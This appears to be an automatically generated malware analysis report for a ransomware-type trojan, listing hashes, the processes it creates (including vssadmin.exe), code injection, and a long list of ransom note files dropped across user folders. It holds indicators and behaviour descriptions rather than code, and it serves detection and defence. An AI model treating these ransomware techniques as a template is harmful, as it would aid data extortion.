Skip to main content

Trojan.Cripack.Gen.1_ac384298a2


HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Cripack.Gen.1 (B) (Emsisoft), Trojan.Cripack.Gen.1 (AdAware), Trojan.Win32.Swrort.3.FD, TeslaCrypt21_pcap.YR (Lavasoft MAS)Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: ac384298a27a0c270c95c0705cd8c8b7

SHA1: 67a26dce94ca72885811099b089c63ea350bf2cd

SHA256: c080be71e768c0e9e0247df5f130236eea6faf389b43bdaa4069ed11c57e84ab

SSDeep: 6144: VSLcsXxwTHRgkiGo8sqsQOCOvXFdOf AB 2IuFMNd6u6qKpacgfjfG0owig: VSL1xwT88sYMXKmABJe u6xpMjog

Size: 369254 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: MicrosoftVisualCv60DLL, UPolyXv05_v6

Company: no certificate found

Created at: 2005-09-10 14:44:52

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1904
vssadmin.exe:228

The Trojan injects its code into the following process(es):

vcwrms.exe:1572

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1904 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\vcwrms.exe (2105 bytes)

The process vcwrms.exe:1572 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\GHISLER\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\howto_recover_files_xnidj.html (6 bytes)
C:\RECYCLER\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Favorites\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Cookies\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (1248 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\SendTo\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\howto_recover_files_xnidj.txt (2 bytes)
C:\totalcmd\NO.BAR (892 bytes)
%Documents and Settings%\Default User\SendTo\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bostonhygiene[1].txt (1198 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Templates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Recent\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Templates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\NetHood\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Templates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@vk[2].txt (1180 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Wireshark\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\winword.doc (426 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Wireshark\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (1280 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js (860 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.bing[2].txt (988 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Cookies\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\howto_recover_files_xnidj.html (6 bytes)
C:\totalcmd\KEYBOARD.TXT (436 bytes)
%Documents and Settings%\%current user%\Templates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ox.sadpanda[2].txt (1052 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\MMC\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Recent\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg (1225 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (1052 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (1084 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (1020 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Templates\excel4.xls (419 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\howto_recover_files_xnidj.txt (2 bytes)
C:\RECYCLER\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Music\My Playlists\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
